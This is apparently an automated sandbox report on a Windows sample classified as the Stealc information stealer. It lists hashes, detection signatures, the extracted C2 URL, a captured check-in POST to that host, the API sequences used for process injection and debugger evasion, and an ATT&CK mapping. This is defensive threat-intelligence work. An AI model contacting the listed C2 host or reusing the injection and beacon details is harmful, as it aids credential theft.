Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1509593
MD5:032d49a1f22f5ec2d498fcf0f4076d91
SHA1:e076ae8c8efe84d414932f84aca43617a31bf0e0
SHA256:e45ef7fdd1a92c5ed40b3365a895623a112ee16444cf0ebe70619cf09d8628ca
Tags:exe
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 032D49A1F22F5EC2D498FCF0F4076D91)
    • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    Process Memory Space: file.exe PID: 6628JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: RegAsm.exe PID: 5972JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: RegAsm.exe PID: 5972JoeSecurity_StealcYara detected StealcJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-11T20:39:03.632416+020020442431Malware Command and Control Activity Detected192.168.2.54970745.152.113.1080TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://45.152.113.10/92335b4816f77e90.phpQAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/PAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/9Avira URL Cloud: Label: malware
          Source: http://45.152.113.10/tAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpIAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/DAvira URL Cloud: Label: malware
          Source: http://45.152.113.10Avira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.php=Avira URL Cloud: Label: malware
          Source: http://45.152.113.10/Avira URL Cloud: Label: malware
          Source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: .pdb8% source: file.exe

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49707 -> 45.152.113.10:80
          Source: Malware configuration extractorURLs: http://45.152.113.10/92335b4816f77e90.php
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.152.113.10Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 45.152.113.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 39 32 39 44 44 44 30 41 32 45 33 34 34 31 30 34 31 38 31 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="hwid"0C929DDD0A2E3441041814------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="build"cry------IECAFHDBGHJKFIDHJJJE--
          Source: Joe Sandbox ViewIP Address: 45.152.113.10 45.152.113.10
          Source: Joe Sandbox ViewASN Name: CODECCLOUD-AS-APCodecCloudHKLimitedHK CODECCLOUD-AS-APCodecCloudHKLimitedHK
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004062D0 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,3_2_004062D0
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.152.113.10Connection: Keep-AliveCache-Control: no-cache
          Source: unknownHTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 45.152.113.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 39 32 39 44 44 44 30 41 32 45 33 34 34 31 30 34 31 38 31 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="hwid"0C929DDD0A2E3441041814------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="build"cry------IECAFHDBGHJKFIDHJJJE--
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/9
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.php
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.php=
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpI
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpQ
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/D
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/P
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/t
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.104
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10H
          Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
          Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
          Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
          Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
          Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0

          System Summary

          barindex
          Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 192000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00404610 appears 316 times
          Source: file.exeStatic PE information: invalid certificate
          Source: file.exe, 00000000.00000000.2056875130.0000000000614000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVQP.exeX vs file.exe
          Source: file.exe, 00000000.00000002.2061103627.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenameVQP.exeX vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@4/1@0/1
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
          Source: C:\Users\user\Desktop\file.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: .pdb8% source: file.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041BA2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A9F5 push ecx; ret 3_2_0041AA08
          Source: file.exeStatic PE information: section name: .text entropy: 7.99138693606094
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 4A30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6472Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401160 GetSystemInfo,3_2_00401160
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
          Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2071712339.0000000000F0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041ACFA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404610 VirtualProtect ?,00000004,00000100,000000003_2_00404610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041BA2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419160 mov eax, dword ptr fs:[00000030h]3_2_00419160
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,3_2_00404610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C8D9 SetUnhandledExceptionFilter,3_2_0041C8D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041ACFA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041A718
          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6628, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5972, type: MEMORYSTR
          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02A32429 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02A32429
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 88F008Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004172F0 GetUserNameA,3_2_004172F0
          Source: file.exe, 00000000.00000002.2061103627.0000000000D82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: file.exe, 00000000.00000002.2061103627.0000000000D82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5972, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5972, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          411
          Process Injection
          1
          Masquerading
          OS Credential Dumping31
          Security Software Discovery
          Remote ServicesData from Local System2
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Disable or Modify Tools
          LSASS Memory31
          Virtualization/Sandbox Evasion
          Remote Desktop ProtocolData from Removable Media2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Account Discovery
          SMB/Windows Admin SharesData from Network Shared Drive12
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
          Process Injection
          NTDS1
          System Owner/User Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets12
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Software Packing
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
